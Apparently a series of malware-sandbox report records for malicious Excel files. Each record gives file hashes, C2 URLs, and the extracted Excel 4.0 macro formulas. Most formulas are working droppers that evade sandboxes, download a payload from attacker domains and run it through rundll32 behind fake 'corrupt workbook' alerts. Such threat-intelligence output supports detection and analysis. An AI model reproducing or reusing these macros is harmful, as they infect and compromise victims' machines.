255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gWBiEB0g5Q\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e91b86dc51b217a975354c0fdc69799790b88a50574aa4d200d33b631f0f620"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5e91b86dc51b217a975354c0fdc69799790b88a50574aa4d200d33b631f0f620","filesize":185344,"md5":"4a4fef18b6ef6466e00e3461fd3ced53","sha1":"4d689a7afd05cb5e38576d91db83686e910348e5","sha256":"5e91b86dc51b217a975354c0fdc69799790b88a50574aa4d200d33b631f0f620","sha512":"54f54324178e9fa5fbe85ad2fc7c16dafeb484a0aae907d338cbc09b25c365228d7862d14cc21d7b68988afcce5c1ae8f2ec93a22c4cae68c7ba55561761d783","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e91b86dc51b217a975354c0fdc69799790b88a50574aa4d200d33b631f0f620.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e97243808719e056750c2db950dea443fb1ba035bd03834dc2f141d3bf87d7f"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5e97243808719e056750c2db950dea443fb1ba035bd03834dc2f141d3bf87d7f","filesize":168448,"md5":"379816d58be29e9c21380e89fba320da","sha1":"46be4df4d285979a7a9138e01710dd261561e916","sha256":"5e97243808719e056750c2db950dea443fb1ba035bd03834dc2f141d3bf87d7f","sha512":"8673af6d4508ebe27e69ca578b62fdd51316c1bdce01bcc8dc07fceb6554466e10e974e1337c9c6267a90d5755e378350e9c4932b7cc160822e72ac574953c0c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e97243808719e056750c2db950dea443fb1ba035bd03834dc2f141d3bf87d7f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SjaVA5wodS\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5ea1bc0547c3d6f5f76ccdd5d057bd6be45fd03cebdf58a85faffebe5bf0f3d5"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5ea1bc0547c3d6f5f76ccdd5d057bd6be45fd03cebdf58a85faffebe5bf0f3d5","filesize":170496,"md5":"0fecb7e4e789559be868712799a8729c","sha1":"89f6957e6f2a7da9c40b92d87d1713559a34d1aa","sha256":"5ea1bc0547c3d6f5f76ccdd5d057bd6be45fd03cebdf58a85faffebe5bf0f3d5","sha512":"cfb7bdd7ed26c963f2c76a97b96c3f8e92438e3161dd4a346019f72a0bad49280ca5520c12645bd00bccf8dd8c350f65674d96534f651140d963ac635391c71b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5ea1bc0547c3d6f5f76ccdd5d057bd6be45fd03cebdf58a85faffebe5bf0f3d5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EbYw6g2xFo\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5ebd464fb1d4530bf4375fd7f19f0ac02e246c348a7ad8af7729f899763a8e79"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5ebd464fb1d4530bf4375fd7f19f0ac02e246c348a7ad8af7729f899763a8e79","filesize":104448,"md5":"f4a7bfbdd693572b93cf84e291d653e0","sha1":"0a0b528bf870309995c1fdc2ccac0fb37251ac20","sha256":"5ebd464fb1d4530bf4375fd7f19f0ac02e246c348a7ad8af7729f899763a8e79","sha512":"2c39f4cf2c97c9f51234496e7fff0de2850c28a1294b78d8026485c78ef88e1cc05e3b24e79128e03b81edbc07cff492bd9b3d3f0eb7ab2b25372675e9d732bf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5ebd464fb1d4530bf4375fd7f19f0ac02e246c348a7ad8af7729f899763a8e79.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"LqWswAvDBR\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5ec12c7453ea53e3c98a116f35a5b112c01e76219c8390aa88f142a6edf73b34"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5ec12c7453ea53e3c98a116f35a5b112c01e76219c8390aa88f142a6edf73b34","filesize":141312,"md5":"1fa3a0482877a9c579b29be520d63e7a","sha1":"e9fbef3a5421409ed84cacc258a0b5066d1b4461","sha256":"5ec12c7453ea53e3c98a116f35a5b112c01e76219c8390aa88f142a6edf73b34","sha512":"d687db41ee6349e14ab9abb6a628dc17ecfc7cf43c408f42660903422479693859cf3228ff00c9e80a517b376ee95f5cb4fc6bd68b9758e5c2e17300c80406f4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5ec12c7453ea53e3c98a116f35a5b112c01e76219c8390aa88f142a6edf73b34.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"ju2kdacJ65\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5ec9ca901c785ef983fa1353c48e0fcc16cf2618871f5271da76514c2e488f23"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5ec9ca901c785ef983fa1353c48e0fcc16cf2618871f5271da76514c2e488f23","filesize":116224,"md5":"679baf14415daa23d5b257d0831db5f5","sha1":"6f0e5d5772afaace1cf5c75783e49f7f75ea487f","sha256":"5ec9ca901c785ef983fa1353c48e0fcc16cf2618871f5271da76514c2e488f23","sha512":"9147d0165f308a423b475bbe4a05c4aea076b030cbc02aaa3fdeda5de28bbad0fbdf63d3ef612fb9155c5193c3630cd1198a9c59d4479c996541292e57ace027","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5ec9ca901c785ef983fa1353c48e0fcc16cf2618871f5271da76514c2e488f23.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OV9laYrBhC\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5ece12188e15426f79405f0101a65e3a05798cf74ea9af4ebb6f6986ffe6545d"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5ece12188e15426f79405f0101a65e3a05798cf74ea9af4ebb6f6986ffe6545d","filesize":152576,"md5":"659c1e505b72f0d935e0ae3c43896a83","sha1":"8e8ff12573bd12978ac6bbd1f7c99d2da26fd956","sha256":"5ece12188e15426f79405f0101a65e3a05798cf74ea9af4ebb6f6986ffe6545d","sha512":"506b0b6fecd18e1a71a0c586694a6af58de4403ad733c85c3b3b790ed25a351e91c3bd556d643033e7219f4fd22cd05132b8495af2034fafc1e48e61337427a6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5ece12188e15426f79405f0101a65e3a05798cf74ea9af4ebb6f6986ffe6545d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"R1Jaj5rIoh\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5ed3144cdc183574250dff1df337d758780b571607b188ccce385bc0d389a785"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5ed3144cdc183574250dff1df337d758780b571607b188ccce385bc0d389a785","filesize":170496,"md5":"ee4864b1fc411ed95ba58c6a0afb68a4","sha1":"4b936f8838f1ab05f820619fc64f87231639271b","sha256":"5ed3144cdc183574250dff1df337d758780b571607b188ccce385bc0d389a785","sha512":"c9c8f2e02b6f3a19adf8e88177b1fe0c05b2493f43a0ed5b23f2ff3871872c6bd9991ed391a90c8518a015ae32d8c50425eaac4b5931f5ed969e010a64f846cf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5ed3144cdc183574250dff1df337d758780b571607b188ccce385bc0d389a785.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VgaFZ45Nnu\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5ef257e795b9ed82eae8a187faefab8ffb254f3b0fb8474dfad03e6a4a23955e"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5ef257e795b9ed82eae8a187faefab8ffb254f3b0fb8474dfad03e6a4a23955e","filesize":185344,"md5":"37e860003b85d8ce4e96e5100fff6f16","sha1":"bb3a8a5d1879dde2b1c30199601ab89319676e7d","sha256":"5ef257e795b9ed82eae8a187faefab8ffb254f3b0fb8474dfad03e6a4a23955e","sha512":"f29793346898b81470204961fa6cff771a668f22c500c0c256669b14b416fab96623d4314e99ffe4811f192d0a9b52290f7d65c364f640bd9fdc02cfdcdf4320","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5ef257e795b9ed82eae8a187faefab8ffb254f3b0fb8474dfad03e6a4a23955e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5efbd8b833be7c8601d54b8b02d60f5f613ab8963511bd48876f91aa523fb3cd"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5efbd8b833be7c8601d54b8b02d60f5f613ab8963511bd48876f91aa523fb3cd","filesize":167936,"md5":"ad8fef579317b1d7b3cac41028131ca8","sha1":"0badd726c91ee130d8bd56b49997b844e650d97a","sha256":"5efbd8b833be7c8601d54b8b02d60f5f613ab8963511bd48876f91aa523fb3cd","sha512":"d8b65f2defb9a1e88a6242ac443504875f46685059406adf11560f00bd0a6989dcd4af69e1c0850e1f6d3b8b28b6c4c356ef0268f1582c6a472ba35aafa89b89","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5efbd8b833be7c8601d54b8b02d60f5f613ab8963511bd48876f91aa523fb3cd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UEwuS8Gv91\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5efc0702b4ffe1ba9554adb042073b1fac6bfd75f4a07df1e8daa9d50a3fa266"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5efc0702b4ffe1ba9554adb042073b1fac6bfd75f4a07df1e8daa9d50a3fa266","filesize":185344,"md5":"a0f5a6312c20accdbbd63e51ed13b85b","sha1":"64f9f9ee302add00317936ff3a7ece3cb8b04eb3","sha256":"5efc0702b4ffe1ba9554adb042073b1fac6bfd75f4a07df1e8daa9d50a3fa266","sha512":"2a65b461ef1b86fad3ee8a438dd5acc114db64e00aae215aba540ba0acffaac0cf5076818ee2d47f2137b007639cd021100d2952866f79f18f2a84b16626cf81","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5efc0702b4ffe1ba9554adb042073b1fac6bfd75f4a07df1e8daa9d50a3fa266.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5efe7d9548937974f75a12fda3267e75091ddf8d654d7570a9329911274def8a"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5efe7d9548937974f75a12fda3267e75091ddf8d654d7570a9329911274def8a","filesize":141312,"md5":"a71ea62bface9e0bad47b06835a91279","sha1":"b438898b28cb16832e68df3298bb0789310977d6","sha256":"5efe7d9548937974f75a12fda3267e75091ddf8d654d7570a9329911274def8a","sha512":"767aaf9a8349cc3ab55978af49b803247ee313fd87967ded0249f9121db1c4c4bebe06dea964a57570241fbff226e153d72013c40332f61cdd28b92a9dffd589","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5efe7d9548937974f75a12fda3267e75091ddf8d654d7570a9329911274def8a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"7r1laQgzmf\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5effaf0c7e6db4dc20600bfcafd22d38da3c8104d10d96d2b1d044c20e5fb122"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5effaf0c7e6db4dc20600bfcafd22d38da3c8104d10d96d2b1d044c20e5fb122","filesize":116224,"md5":"1870e0f5824563ee4a2bb71f88212a1a","sha1":"dedb0323f512e5b677b59d8cf9e193aa76637273","sha256":"5effaf0c7e6db4dc20600bfcafd22d38da3c8104d10d96d2b1d044c20e5fb122","sha512":"8cb85bc2e66667811cbe823f73feae2de1ee59b22415be533ec243ccdf165a52ac01d831cfb84c1e7830292c11c177c56a0596736a8dc0909b4f61023f67d0de","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5effaf0c7e6db4dc20600bfcafd22d38da3c8104d10d96d2b1d044c20e5fb122.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vNEvOdtHci\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5f173f64e23d4b68b8bfcaf0494e69466a5f4c3cb7445a2a77e8d710727c7dd0"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5f173f64e23d4b68b8bfcaf0494e69466a5f4c3cb7445a2a77e8d710727c7dd0","filesize":109568,"md5":"aa0a61c0d5b821583c626575caf2abd5","sha1":"8885cd9db4b18ec7ba6478cdad052ea27d57e3eb","sha256":"5f173f64e23d4b68b8bfcaf0494e69466a5f4c3cb7445a2a77e8d710727c7dd0","sha512":"be3c4bdee74c66cdead2154321ba1c9c6e919dda06c3a2c6a3fc6af6ea2c9a86f40f5b1cf6fbf560fcb673fb07a6ec6cb16266ac30e081aeb0a11f4fbfafb4b1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5f173f64e23d4b68b8bfcaf0494e69466a5f4c3cb7445a2a77e8d710727c7dd0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"1KSipfa7YR\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5f1c9e8b833211e9bc6c535189bd95b6ad9acfea81b74b265c895f20405c8d68"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5f1c9e8b833211e9bc6c535189bd95b6ad9acfea81b74b265c895f20405c8d68","filesize":185344,"md5":"c7f01b4310813703992c1a2ceb7a41b6","sha1":"4a1a06bffb0cebf6ab2821dc521f7df135ce381c","sha256":"5f1c9e8b833211e9bc6c535189bd95b6ad9acfea81b74b265c895f20405c8d68","sha512":"f672ea4702d2696182068331531e488281bd191e2b3be571b51c52654bc48a3a05559326d85682cbbe27bd5c5d0771dd0a906250e77ee678c85ee2b8d969897a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5f1c9e8b833211e9bc6c535189bd95b6ad9acfea81b74b265c895f20405c8d68.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5f4cef4ce54341ebb224654df0543fba553c61d110c2fd95ba846b218bf3c572"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5f4cef4ce54341ebb224654df0543fba553c61d110c2fd95ba846b218bf3c572","filesize":147968,"md5":"3c75877aa4e74e9b96356ea025a91a34","sha1":"d4b6ec79a12154940494ef3bcd3b347ae85aa047","sha256":"5f4cef4ce54341ebb224654df0543fba553c61d110c2fd95ba846b218bf3c572","sha512":"1f9fdd18e2e9d72e0c8baf5bdb7076b2ac02a3023245c2caa50917fc0e7f9c50593864c1e0d019c0d4b6059c1f8627617730a943686ce7d037e2634cf9661582","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5f4cef4ce54341ebb224654df0543fba553c61d110c2fd95ba846b218bf3c572.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"GmGUVFhj69\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5f56bf95d17b439c0a3d4e7239ef432fb97646c6332408548f22e60062e19a87"},"analysis":{"reported":"2020-04-09T16:16:34Z","score":10},"files":[{"filename":"5f56bf95d17b439c0a3d4e7239ef432fb97646c6332408548f22e60062e19a87","filesize":225280,"md5":"616dd727ec5e24a66fed61ab6984bfcd","sha1":"1320eb9bea6f681469a6b0feea8b87f3c7dccfa2","sha256":"5f56bf95d17b439c0a3d4e7239ef432fb97646c6332408548f22e60062e19a87","sha512":"24af006cfe2cdfcabf59ef5a2995dc1bd89c87851197a6a8c877a09d5d3fb164017f3074022eaec330ca95e1f6f67d039b995b3fbd51335b7f19c88b688e3525","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5f56bf95d17b439c0a3d4e7239ef432fb97646c6332408548f22e60062e19a87.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 